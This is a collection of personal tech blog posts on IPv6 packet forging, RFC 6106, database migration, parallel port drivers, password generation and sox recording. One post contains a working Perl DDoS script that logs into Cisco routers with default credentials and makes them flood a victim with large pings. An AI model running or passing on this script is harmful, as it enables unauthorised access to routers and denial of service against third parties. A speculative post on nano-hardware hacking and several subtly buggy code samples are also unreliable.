ICMPv6 Python client using pcs

Reading about IPv6 security, i get the need to write a simple IPv6 client using  python as first step, and libnet6 later.

Well on python there are a nice module named pcs, that permit to forge packet, here is a example of a icmpv6 client :

import pcs

from pcs.packets.ipv6 import *
from pcs.packets.icmpv6 import *
from pcs.packets.ethernet import *
from socket import *

# building ethernet header
e = ethernet()
e.src = ether_atob(’de:de:de:de:de:de’)
e.dst = ether_atob(’da:da:da:da:da:da’)
e.type = ETHERTYPE_IPV6

# building ipv6 header
ip6 = ipv6()
ip6.src = ip6.dst = inet_pton(AF_INET6, "dead::beef")
ip6.length = 8 # equal to payload length.
ip6.hop = 255
ip6.next_header = IPPROTO_ICMPV6

# building icmpv6 echo request
icmpv6 = icmpv6(ICMP6_ECHO_REQUEST)
icmpv6.code = 0
icmpv6.id = 0x01
icmpv6.checksum = icmpv6.cksum(ip6, "") & 0xffff

# we can now send our packet
pcap = pcs.PcapConnector(’ral0’)
pkt = pcs.Chain([e, ip6, icmpv6])
pcap.write(pkt.bytes, len(pkt.bytes))

In the fast, you may see a pretty ICMP reply using your favorite sniffer wireshark or may be tcpdump. But if your prefer to be more techos you can get it using pcap module as like as :

import dpkt, pcap
pc = pcap.pcap()
pc.setfilter('icmp6')
for timestamp, packet in pc:
    print dpkt.ethernet.Ethernet(pkt)

IPv6 Router Advertisement Options for DNS Configuration (RFC6106)

Publication date  : November 2010
RFC Author(s)       : S. Park, L. Beloeil, S. Madanapalli
Category              : Standards Track

This article describe some specifications of RA DNS options, which allow  to IPv6 routers to advertise a list of DNS recursive server addresses and a list of Domain name server Search List to an IPv6 node.

RA Options are based on Neighbor Discovery (ND) for IPv6 stateless  autoconfiguration, that provide a simple way to configure mobile node in a IPv6 network and which make ability to nomadic hosts to reach Internet Services. In this document (section 5) the IPv6 DNS configuration defines two ND  options :

1. The Recursive DNS Server (RDNSS) Contains one or more IPv6 addresses of recursive DNS servers, this Option Format contain 4 field :
Type (8-bit), Length (8-bit), Reserved(16-bit), Lifetime(32-bit) and Addresse of IPv6 Recursive DNS servers (128-bit)

2. The DNS Search List (DNSSL) Contains one or more domains name, this Option Format contain 4 field :
Type (8-bit), Length (8-bit), Reserved(16-bit), Lifetime(32-bit) and Domain Names of DNS Search List (128-bit)

Section 5.1, define that a packet with lifetime value set all one bits (0xffffffff) represents infinity, which mean that the node must keep the DNS parameters, until next update.

Section 5.2, define that a packet with lifetime value set to zero means that RDNSS address must no longer be used.

The RFC describe also, that storing RDNSS addresses from at least two different sources is highly recommended.

Source :
https://tools.ietf.org/html/rfc6106

Converting MySQL to PostgreSQL

It has been a long time that i did not write a post into my blog, well it’s time, working with bacula, i got a need to upgrade my database from MySQL to PostgreSQL. If you have to do so, well you can do it simpley using command line and tools given with these database applications.

First of all dump your tables with

$ mysqldump –compatible=postgresql databasename > outputfile.sql

but even then you will have to change quote escaping:

$ sed “s/\\\’/\’\'/g” outputfile.sql

You also have to manually modify the data types when /int.* unsigned/ “bigint” when /bigint/ “bigint” when “bit(1)” “boolean” when “tinyint(1)” “boolean” when /tinyint/ “tinyint” when /int/ “integer” when /varchar/ “varchar” when /char/ “char” when /(float|decimal)/ “decimal” when /double/ “double precision”

After you convert your tables, import them the same way you were used to in MySQL, that is

$ psql -h server -d databasename -U username -W < data.sql

Create random password using /dev/urandom

In many situation administrators are affronted to generate passwords, however it’s more secure to keep in eyes random password even that ordinarie one.
Well, for such use let’s keep it simple and let’s define some files:

/dev/random: is a special file that serves as a true random number generator or as a pseudorandom number generator.
/dev/urandom: (“unlocked” random source) which reuses the internal pool to produce more pseudo-random bits.

If your system does not have /dev/random and /dev/urandom created already, they can be created with the following commands:
$ mknod -m 644 /dev/random c 1 8
$ mknod -m 644 /dev/urandom c 1 9
$ chown root:root /dev/random /dev/urandom

$ tr -cd a-zA-Z0-9 < /dev/urandom | head -c 12 ; echo ""

How to run source bash command between two lines and from file

When i ran my start ADSL connection script, i've been many times blocked by a lock somewhere.
It's no matter, so i realized a python script that can do what the bash command "source" does, even this few line of python can gives you possibility to run codes given between two lines.
Here is the code :

#!/usr/bin/env python
import sys, os

if len(sys.argv) != 4:
   print "Usage: source file startline endline"
   sys.exit(1)

file  = sys.argv[1]
start = int(sys.argv[2])
end   = int(sys.argv[3])

fd=open(file, 'r')
data=fd.readlines()
enter = '\n'

for item in data:
   if enter  in data:
      data.remove(enter)

for cmd in data[start-1:end]:
   # debug print "exec command:", cmd.strip()
   os.popen(cmd.strip())

How to send a bit to the parallel port on Linux (2nd part)

In this second part of how to send bits to the parallel port on Linux, i describe here basics on how to do the same on kernel space.
Here is a simple linux kernel module, that create a char device named parlport, and you can communicate directly with device using the /dev/parlport

#include <linux/module.h>
#include <linux/kernel.h>
#include <linux/init.h>
#include <linux/fs.h>
#include <linux/unistd.h>
#include <asm/uaccess.h>
#include <linux/file.h>
#include <asm/io.h>

#define NAME “parlp”
#define VERSION “0.1″
#define LICENSE “GPL”
#define DESCPT “Simple Parallel Port LED driver”
#define AUTHOR “Mezgani Ali\n”\
“mail: mezgani [AT] nativelabs [.] org\n”\
“blog: http://securfox.wordpress.com/&#8221;

#define SUCCESS 0
#define DEVICE_NAME “parlport”
#define BASEPORT 0×0378

static int major = 61; /* major number assigned to our device driver */

static int __init start_module(void);
static void __exit clean_module(void);

static int device_open(struct inode *, struct file *);
static int device_release(struct inode *, struct file *);
static ssize_t device_read(struct file *, char *, size_t, loff_t *);
static ssize_t device_write(struct file *, char *, size_t, loff_t *);

static struct file_operations fops = {
.open = device_open,
.release = device_release,
.read = device_read,
.write = device_write
};

static int
__init start_module(void)
{
int result;

result = register_chrdev(major, DEVICE_NAME, &fops);

if (result < 0) {
printk(KERN_ALERT “Registering device failed with %d\n”, major);
return result;
}

if (!(request_region(BASEPORT, 1, DEVICE_NAME))){
printk(KERN_WARNING “Winbond error request region: %X\n”, BASEPORT);
release_region(BASEPORT, 1);

return result;
}

printk(KERN_INFO “I was assigned major number %d. To talk to\n”, major);
printk(KERN_INFO “the driver, create a dev file with\n”);
printk(KERN_INFO “‘mknod /dev/%s c %d 0′.\n”, DEVICE_NAME, major);

return SUCCESS;
}

static void
__exit clean_module(void)
{
release_region(BASEPORT, 1);

unregister_chrdev(major, DEVICE_NAME);
printk(KERN_ALERT “unregister_chrdev && cleaning module\n”);

}

static int
device_open(struct inode *inode, struct file *file)
{
try_module_get(THIS_MODULE);
return SUCCESS;
}

static int
device_release(struct inode *inode, struct file *file)
{
module_put(THIS_MODULE);
return 0;
}

static ssize_t
device_read(struct file *filp, char *buffer, size_t length, loff_t * offset)
{
unsigned char pbuffer;
int len;

/* input a byte (8 bits) from a port, call inb(port), it returns the byte it got */
pbuffer = inb(BASEPORT);

len = copy_to_user(buffer, &pbuffer, 1);
if (len) return -EFAULT;

if (*offset == 0) {
*offset += 1;
return 1;
} else {
return 0;
}
}

static ssize_t
device_write(struct file *filp, char *buffer, size_t length, loff_t * offset)
{

char pbuffer, *ptr;
int len;

ptr = buffer + length – 1;
len = copy_from_user(&pbuffer, ptr, 1);
if (len) return -EFAULT;

/* output the data to parallel port */
outb(pbuffer, BASEPORT);
return 1;
}

module_init(start_module);
module_exit(clean_module);

MODULE_LICENSE(LICENSE);
MODULE_AUTHOR(AUTHOR);
MODULE_DESCRIPTION(DESCPT);
MODULE_VERSION(VERSION);

Example of use after compilation ;

# insmod parlport.ko
# mknod /dev/parlport c 61 0
# chown 666 /dev/parlport
# echo F > /dev/parlport

Future of hacking

Many secret of nano technology are reveled, i think that the nano science become more and more interesting.

Germans and Americans scientist worked on it 20 years old, so this technology become more and more exploited and deployed in many domains, medicine, military, mechanic, pharmacy …
Dr. Altmann  has published a book about some dangerous military uses if you want read more please check here

More than that many researcher ask for dead code, to prove their reel visibility of the world and hiding the GOD existence, i’m really sorry to know about these
thoughts of this kind of intellectuals.

Anyway, a simple use can affect political people even to write and read event from their mind.

In computer science :
i think that if we can not hack brains, no links are needed to hack into boxes, only nano metals and could be set by materials constructor into some referred data bus or in NIC’s, to deserve attacker remotely using signals in some dedicated channel, well every bit sent are mirrored on the attacker simulator.

finally it sound like telegram methods, very exciting and awesome what human can drive.

How to send a bit to the parallel port on Linux

It will be nice idea To do a network monitoring  project with LEDs, the fastest way is to use a Perl module called Device::ParallelPort, this module provides an API to all parallel ports. Device::ParallelPort has a number of drivers for multiple operating systems that includes a direct access module for Linux and the Linux ParPort driver. Work almost on  windows and FresBSD.

In python, there are a  module named pyparallel, and in c in userspace we may use Unix Standard and System Input/Output routines.

Here a simple example that make all LEDS connected to parallel port blinking 5 times.

  #include <stdio.h>
  #include <unistd.h>     /* For sleep(), ioperm(), inb() and outb(). */
  #include <sys/io.h>     /* Perhaps asm/io.h on other systems. */

  /* Address of the first parallel port. found in BIOS settings. */
  #define kDATA_REG (0x0378)          /* Base address = data register. */
  #define kSTAT_REG (DATA_REG + 1)    /* Status register. */
  #define kCONT_REG (DATA_REG + 2)    /* Control register. */

  int main()
  {
      int i;

      if (ioperm(kDATA_REG, 1, 1))    /* Get permission to access this port. */
          {
          printf("ioperm(%x) failed.\nYou must be root to execute!\n", kDATA_REG);
          return 1;
          }

      /* Assume port is already in output mode (bit 5 in control register). */
      for (i = 0; i < 5; i++)        /* Let the LED(s) blink. */
          {
          outb(255, kDATA_REG);       /* All 8 datalines high. */
          sleep(1);
          outb(0, kDATA_REG);         /* All 8 datalines low.  */
          sleep(1);
          }

      return 0;
  }

DDOS based on ICMP echo request

Prof of concept of a simple DDOS program based on ICMP echo request from cisco routers.
With mass scanner you can get an important list of cisco default install
and by looking to their MTU and throughtput, you may tune the ICMP size to DOS a big network in few seconds
the program is informational only, please keep it on this way

#!/usr/bin/perl
use Parallel::ForkManager;
use Net::Telnet();
use Net::Telnet::Cisco;
use strict;

sub usage {
print “\n\n\e[00;34mddsco.pl [victim] [cisco file list] \e[00m \n\n";
exit;
}

my $victim = $ARGV[0];
my $file = $ARGV[1];

if ((!$victim) or (!$file)) {
usage;
}

my $login = “cisco”;
my $passwd = “cisco”;
my $enable = “cisco”;
my $mtu = 1500;
my $cmd = “ping “.$victim.” size 1500 df-bit repeat 1000″;

open FILE, “<$file” or die $!;
my $pm = new Parallel::ForkManager(100);
for (1..1000) {
while () {
$pm->start and next;
my $host = $_;
my $session = Net::Telnet::Cisco->new(Host => $host);
$session->login($login, $passwd);
$session->enable($enable);
$session->cmd($cmd);
$pm->finish; ## end point of the parallel process
}
}
$pm->wait_all_children; ## wait for the child processes

Recording a Sound File

To record a simple WAV sample from the microphone and save it to a file called `hello.wav’, install sox and type:
$ rec hello.wav

this command begins an 8,000 Hz, monaural 8-bit WAV recording to the file `hello.wav’, and keeps recording until you interrupt it with C-c.
While the default is to make a low-fidelity recording — 8,000 Hz, monaural 8-bit samples — you can specify that a high-fidelity recording be made.
(But remember that high-fidelity recordings take up much more disk space.)

To make a stereo recording, use the `-c’ option to specify the number of channels, giving 2 as the argument. To make a 16-bit recording, give `w’ (“wide”) as the argument to the `-s’ (“sample size”) option.
Set the recording sample rate by giving the samples per second to use as an argument to the `-r’ option. For CD-quality audio at 44,100Hz, use `-r 44100′.
Finally, to record a file in a particular format, either give the name of the format as an argument to the `-f’ option, or use the traditional file name extension for that format in the output file name (see Sound File Formats).

To make a high-fidelity recording from the microphone and save it to a WAV-format file called `goodbye.wav’, type:
$ rec -s w -c 2 -r 44100 goodbye.wav

(From DSL cookbook)